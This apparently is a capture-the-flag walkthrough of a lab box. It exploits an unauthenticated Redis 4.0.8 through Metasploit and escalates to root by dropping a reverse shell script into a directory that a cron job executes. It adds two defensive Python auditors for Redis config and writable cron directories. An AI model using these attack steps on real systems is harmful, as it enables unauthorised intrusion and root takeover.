Red
mkdir nmap
sudo rustscan -a 172.31.1.9 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Port 6379 is open; this is the default Redis port.
The service reports Redis version 4.0.8.
There's an RCE exploit available on Metasploit for this Redis version
Open msfconsole and search for Redis exploits.
Type use 6 and press Enter.
Set the following configuration and run the exploit.
Sweet! :D
Type shell in your meterpreter session, then spawn a new reverse shell with python3 and you will have a stable shell.
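The foothold above exists because Redis is reachable on its default port with no authentication in front of it. As an added example (not part of the original write-up, and not a Redis project tool), here is a small audit of a redis.conf that flags the settings an operator would fix: a non-loopback bind, protected mode switched off, no requirepass, and administrative commands left under their default names. Both configuration texts are constructed samples; the password value is a placeholder.

```python
import shlex
from typing import Dict, List

# Constructed sample of a weak redis.conf: reachable on every interface,
# protected mode disabled, no password. Not taken from the target machine.
WEAK_CONF = """
# redis.conf (constructed example)
bind 0.0.0.0
port 6379
protected-mode no
"""

# Constructed sample of the same file after hardening. The requirepass
# value is a placeholder, not a real secret.
HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command DEBUG ""
"""

# Commands the Redis security guidance recommends renaming or disabling.
DANGEROUS_COMMANDS = {"CONFIG", "DEBUG"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the list of its argument lists.

    Directives such as rename-command may appear more than once, so every
    occurrence is kept. Comments and blank lines are ignored; shlex handles
    quoted values like the empty string in rename-command CONFIG "".
    """
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return a list of human-readable findings; an empty list means clean."""
    conf = parse_conf(text)
    findings: List[str] = []

    # 1. Exposure: which addresses does the server bind to?
    bind_addrs = [a for occ in conf.get("bind", []) for a in occ]
    exposed = [a for a in bind_addrs if a.lstrip("-") not in LOOPBACK]
    if not bind_addrs:
        findings.append("bind: no bind directive, Redis listens on every interface")
    elif exposed:
        findings.append("bind: listens on non-loopback address(es): " + ", ".join(exposed))

    # 2. Protected mode explicitly turned off.
    pm = conf.get("protected-mode", [[]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode: explicitly disabled")

    # 3. No authentication at all.
    if "requirepass" not in conf:
        findings.append("requirepass: not set, clients connect without authentication")

    # 4. Administrative commands still reachable under their default names.
    renamed = {occ[0].upper() for occ in conf.get("rename-command", []) if occ}
    for cmd in sorted(DANGEROUS_COMMANDS - renamed):
        findings.append(f"rename-command: {cmd} is still reachable under its default name")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit_redis_conf(text) or ["no findings"]:
            print("  -", finding)
```

The check reads the on-disk file rather than querying the live server, so it can run in a config-review pipeline before deployment; a running instance with the weak settings is exactly what the scan at the top of the write-up finds.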
Post Exploitation
Transfer pspy64 to the target machine and run the binary. After about a minute, you will notice a cron job running.
The script simply executes every file inside the /var/log/redis/logs directory. Create a reverse shell script in that directory.
Start a reverse shell listener; you should receive a shell within a minute.
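The privilege escalation works because a root cron job runs whatever it finds in a directory that a low-privileged user can write to. As an added example (not from the original write-up), here is a small audit that takes crontab lines, pulls out the filesystem paths they reference, walks up to the nearest existing directory and reports any that are group- or world-writable. The crontab entries and the directory tree are constructed inside the script under a temporary directory, mirroring the pattern from the box (a log directory whose contents are executed every minute) without touching real system paths.

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Paths referenced by a cron command: start with "/" and stop at whitespace,
# quotes, globs or command separators.
PATH_RE = re.compile(r"(/[^\s\"'*;]+)")


def build_demo_tree() -> str:
    """Create a constructed directory tree under a private temp dir.

    redis/logs is made world-writable (the misconfiguration); backup keeps
    the usual 0755. Returns the root so the caller can clean up.
    """
    root = tempfile.mkdtemp(prefix="cron-audit-")  # mkdtemp gives 0700
    loose = os.path.join(root, "redis", "logs")
    os.makedirs(loose)
    os.chmod(loose, 0o777)
    safe = os.path.join(root, "backup")
    os.makedirs(safe)
    os.chmod(safe, 0o755)
    return root


def cron_entries(root: str) -> List[str]:
    """Constructed crontab lines (system crontab format with a user field)."""
    return [
        f'* * * * * root for f in {root}/redis/logs/*; do sh "$f"; done',
        f"0 3 * * * root tar czf {root}/backup.tgz {root}/backup",
    ]


def writable_by_others(path: str) -> bool:
    """True if the group or world write bit is set on the path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def nearest_existing_dir(path: str) -> str:
    """Walk up from a referenced path until an existing directory is found."""
    while path and path != "/" and not os.path.isdir(path):
        path = os.path.dirname(path)
    return path


def audit_cron_lines(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (cron line, directory) pairs where the directory is writable
    by users other than its owner, so its contents cannot be trusted."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        seen = set()
        for candidate in PATH_RE.findall(line):
            directory = nearest_existing_dir(candidate)
            if directory and directory not in seen and os.path.isdir(directory):
                seen.add(directory)
                if writable_by_others(directory):
                    findings.append((line, directory))
    return findings


def run_demo() -> List[Tuple[str, str]]:
    """Build the tree, audit the constructed crontab and return the findings."""
    root = build_demo_tree()
    return audit_cron_lines(cron_entries(root))


if __name__ == "__main__":
    for line, directory in run_demo():
        print(f"WRITABLE BY OTHERS: {directory}\n  used by: {line}")
```

On a real host the same function would be fed the lines of /etc/crontab and the files under /etc/cron.d; the fix for the finding it reports is to make the directory owned and writable only by root (or the account the job runs as), not to change the cron schedule.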